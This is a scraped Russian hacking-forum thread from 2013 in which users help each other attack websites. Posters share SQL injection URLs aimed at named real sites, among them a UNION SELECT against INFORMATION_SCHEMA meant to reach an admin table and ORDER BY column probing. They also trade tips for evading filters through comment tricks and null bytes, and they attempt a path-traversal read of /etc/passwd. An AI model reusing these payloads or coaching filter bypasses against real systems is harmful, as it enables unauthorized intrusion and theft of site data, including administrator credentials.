09.11.2013, 20:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от SunHere
Окей, я начал пробовать подключить этот файл, но выводится следующее сообщение
Код HTML:
Warning: include(inc/../../../../../../../etc/passwd.php)
Когда же добавляю ../../../../../../etc/passwd%00, то вместо ошибки на сайте выводится стандартная страница, как будто без параметров отправился запрос. Какие тут возможные действия дальше? Просмотри исходный код страници и как вариант еще попробовать ../../../../../../etc/passwd %000 иногда проходит.
|
|
|
10.11.2013, 19:09
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Нашёл скулю, не могу достать данные с таблицы admin
Код:
http://www.olvia.ru/rus/products.php?s=3%27+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+50,99+--+
|
|
|
|
10.11.2013, 19:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Unknowhacker
Нашёл скулю, не могу достать данные с таблицы admin
Код:
http://www.olvia.ru/rus/products.php?s=3%27+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+50,99+--+
таблица admin находится в базе test
|
|
|
|
10.11.2013, 19:26
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 6
С нами:
6659606
Репутация:
0
|
|
Добрый день)
server.com/index.php?id=22' выдает следующее:
DB ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22'' LIMIT 1' at line 1
SELECT * FROM `Films` WHERE `ID` = '22'' LIMIT 1
Notice: Undefined index: ID in /usr/local/www/server.com/index.php on line 75
При попытке вставить в запрос UNION SELECT подвисает (Код ошибки: ERR_TIMED_OUT), на UNION SELCT:
SELECT * FROM `Films` WHERE `ID` = '22' UNION SELCT' LIMIT 1
Как нибудь можно обойти? И еще фильтрует ##
|
|
|
|
10.11.2013, 22:56
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от chado
Добрый день)
server.com/index.php?id=22' выдает следующее:
DB ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22'' LIMIT 1' at line 1
SELECT * FROM `Films` WHERE `ID` = '22'' LIMIT 1
Notice: Undefined index: ID in /usr/local/www/server.com/index.php on line 75
При попытке вставить в запрос UNION SELECT подвисает (Код ошибки: ERR_TIMED_OUT), на UNION SELCT:
SELECT * FROM `Films` WHERE `ID` = '22' UNION SELCT' LIMIT 1
Как нибудь можно обойти? И еще фильтрует ##
нужно закомментировать остаток запроса --+
|
|
|
|
11.11.2013, 14:07
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 6
С нами:
6659606
Репутация:
0
|
|
Сообщение от Expl0ited
нужно закомментировать остаток запроса --+
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1
server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1
Видимо комментирование только через # и этот символ фильтруется.
Что нибудь можно сделать?
|
|
|
|
11.11.2013, 14:24
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от chado
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1
server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1
Видимо комментирование только через # и этот символ фильтруется.
Что нибудь можно сделать?
Попробуй аналог незакрытого коммментария /* для 5-ой версии mysql:
|
|
|
|
11.11.2013, 14:31
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от chado
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1
server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1
Видимо комментирование только через # и этот символ фильтруется.
Что нибудь можно сделать?
server.com/index.php?id=1'+order+by+100--+1
|
|
|
|
11.11.2013, 15:19
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 6
С нами:
6659606
Репутация:
0
|
|
Сообщение от Expl0ited
Попробуй аналог незакрытого коммментария /* для 5-ой версии mysql:
server.com/index.php?id=-1'+OR+`ID`+=+'202
выдает правильную страницу (SELECT * FROM `Films` WHERE `ID` = '-1' OR `ID`='202' LIMIT 1), на нем и тестирую:
server.com/index.php?id=-1'+OR+`ID`+=+'202';%00
показывает правильную страницу (ID = 202) без ошибок. Я так понимаю комментирование работает?
Сообщение от Expl0ited
server.com/index.php?id=202'+order+by+100--+1
В чистом виде выдает:
DB ERROR: Unknown column '100' in 'order clause'
SELECT * FROM `Films` WHERE `ID` = '202' order by 100-- 1' LIMIT 1
c order+by+1 до order+by+9
выдает правильную страницу.
Как засунуть туда union select, если при слове select страница отваливается по timeout? Пробовал и в разных регистрах, и со скобками - не работает. Может есть другие запросы для "побаловаться" с базой?
|
|
|
|
11.11.2013, 19:58
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
http://www.aquaprima.ru/article_show.php?art_id=199+order+by+1+--+ Невозможно подобрать кол-во столбцов.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
